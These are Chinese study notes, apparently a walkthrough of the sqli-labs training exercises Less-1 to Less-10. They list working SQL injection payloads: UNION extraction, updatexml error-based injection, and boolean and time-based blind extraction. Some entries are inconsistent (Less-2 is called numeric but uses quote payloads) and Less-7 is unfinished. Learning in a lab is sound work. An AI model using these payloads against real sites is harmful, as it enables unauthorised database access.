Less-1(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(字符注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-2(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-3(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-4(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-5(错误注入)
1.无显示
2.有错误
3.使用错误注入
Less-6(错误注入)
1.无显示
2.有错误
3.使用错误注入
Less-7(读写文件)
1.查看是否有回显
Less-8(布尔盲注)
1.没有回显
2.没有报错
3.布尔盲注获取数据库名
4.计算数据库名字的位数
5.猜测每一位
Less-9(延时注入--1‘)
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位
Less-10(延时注入--1“)
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位
Less-1(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(字符注入)
3.1判断其列数
?2' order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2' and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2' and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-2(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(数字型注入)
3.1判断其列数
?2' order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2' and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2' and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-3(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(数字型注入)
3.1判断其列数
?2') order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2') and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2') and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-4(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2"
3.使用联合查询(数字型注入)
3.1判断其列数
?2") order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2") and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2") and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-5(错误注入)
1.无显示
2.有错误
3.使用错误注入
?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+
Less-6(错误注入)
1.无显示
2.有错误
3.使用错误注入
?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+
Less-7(读写文件)
1.查看是否有回显
根据 Use outfile判断,此处使用写入文件的方式
2.
Less-8(布尔盲注)
1.没有回显
2.没有报错
3.布尔盲注获取数据库名
?id=2' and database()='ajest' --+ 没有显示,成本太高
4.计算数据库名字的位数
?id=2' and length(database())>0 --+ ?id=2' and length(database())=8 --+ 显示八位
5.猜测每一位
?id=2' and ascii(substr((select database()),1,1))=115 --+
115 s
101 e
99 c
117 u
114 r
105 i
116 t
121 y
数据库:security
Less-9(延时注入--1‘)
1.没有回显
?id=1
2.没有报错
?id=1'
3.使用延时注入
?id=1' and if(length((select version()))=6,sleep(5),1) --+ 版本号共有6位
4.分别查看每一位
?id=1' and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+
53 5
46 .
55 7
46 .
50 2
54 6
版本号 :5.7.26
Less-10(延时注入--1“)
1.没有回显
?id=1
2.没有报错
?id=1"
3.使用延时注入
?id=1" and if(length((select version()))=6,sleep(5),1) --+ 版本号共有6位
4.分别查看每一位
?id=1" and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+
53 5
46 .
55 7
46 .
50 2
54 6
版本号 :5.7.26
